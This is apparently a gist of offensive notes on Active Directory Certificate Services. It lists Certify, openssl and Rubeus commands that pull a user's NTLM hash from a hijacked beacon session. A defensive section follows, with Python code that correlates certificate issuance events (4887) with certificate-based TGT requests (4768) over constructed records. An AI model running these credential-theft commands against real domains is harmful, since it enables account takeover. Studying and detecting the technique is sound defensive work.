@b4cktr4ck2
Created February 22, 2023 00:28
ADCS Notes
If you're in a user's context where you don't have their password (i.e. they ran a beacon, you used steal_token, etc.) and ADCS is enabled, you can use Certify + Rubeus to request a certificate and get their NTLM hash.
1. Certify.exe request /ca:DC01.alexlab.local\alexlab-DC01-CA
2. Copy-paste everything from BEGIN RSA PRIVATE KEY to END CERTIFICATE into a file ending in .pem on a Linux box
3. Run openssl pkcs12 -in filename.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
4. Upload the PFX file into your beacon or base64 encode it with base64 cert.pfx -w 0
5. Run Rubeus.exe asktgt /getcredentials /user:youruser /certificate:test.pfx /domain:alexlab.local /dc:dc01 /show
^ In step 5 you can pass the base64 string instead of uploading the PFX.
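From the defender's side, the sequence above leaves two log events on the domain: the CA issues a certificate (Security Event ID 4887) and shortly afterwards the same account requests a TGT with a certificate instead of a password (Event ID 4768 carrying Certificate Information). The following correlation is an added example, not part of the gist; the event records are constructed and simplified (field names like `requester` and `cert_serial` are stand-ins for the Windows XML fields), and the one-hour window is an assumed tuning value.

```python
"""Correlate ADCS issuance (4887) with a following certificate-based TGT
request (4768 with certificate info) for the same account. Added example;
records below are constructed and simplified, not exported Windows logs."""
from datetime import datetime, timedelta

# Constructed, simplified event records (made-up values, flattened fields).
EVENTS = [
    {"id": 4887, "time": "2023-02-22T00:20:05", "requester": "ALEXLAB\\jdoe",
     "attributes": "CertificateTemplate:User"},
    {"id": 4768, "time": "2023-02-22T00:21:40", "account": "jdoe",
     "cert_issuer": "alexlab-DC01-CA", "cert_serial": "1A00000005",
     "client_ip": "10.0.0.15"},
    {"id": 4768, "time": "2023-02-22T03:00:00", "account": "svc_backup",
     "cert_issuer": "", "cert_serial": "", "client_ip": "10.0.0.9"},
    {"id": 4768, "time": "2023-02-23T08:00:00", "account": "jdoe",
     "cert_issuer": "alexlab-DC01-CA", "cert_serial": "1A00000005",
     "client_ip": "10.0.0.15"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def _sam(requester):
    # "DOMAIN\\user" -> "user"; matched case-insensitively against 4768
    return requester.split("\\")[-1].lower()


def find_cert_logons_after_issuance(events, window=timedelta(hours=1)):
    """Return (account, issuance_time, logon_time) for each 4768 that
    carries certificate info and follows a 4887 issuance to the same
    account within `window`. Smart-card users also produce certificate
    4768s, so the fresh-enrollment correlation is what makes a hit
    worth an analyst's attention, not the certificate logon alone."""
    issued = {}
    for e in events:
        if e["id"] == 4887:
            issued.setdefault(_sam(e["requester"]), []).append(_ts(e["time"]))
    hits = []
    for e in events:
        if e["id"] != 4768 or not e.get("cert_serial"):
            continue  # password-based TGT request, or no cert data
        acct = e["account"].lower()
        t = _ts(e["time"])
        for issued_at in issued.get(acct, []):
            if timedelta(0) <= t - issued_at <= window:
                hits.append((acct, issued_at.isoformat(), t.isoformat()))
    return hits
```

On the constructed records only the first jdoe logon is flagged; the one a day later falls outside the window and the password-based svc_backup request carries no certificate data.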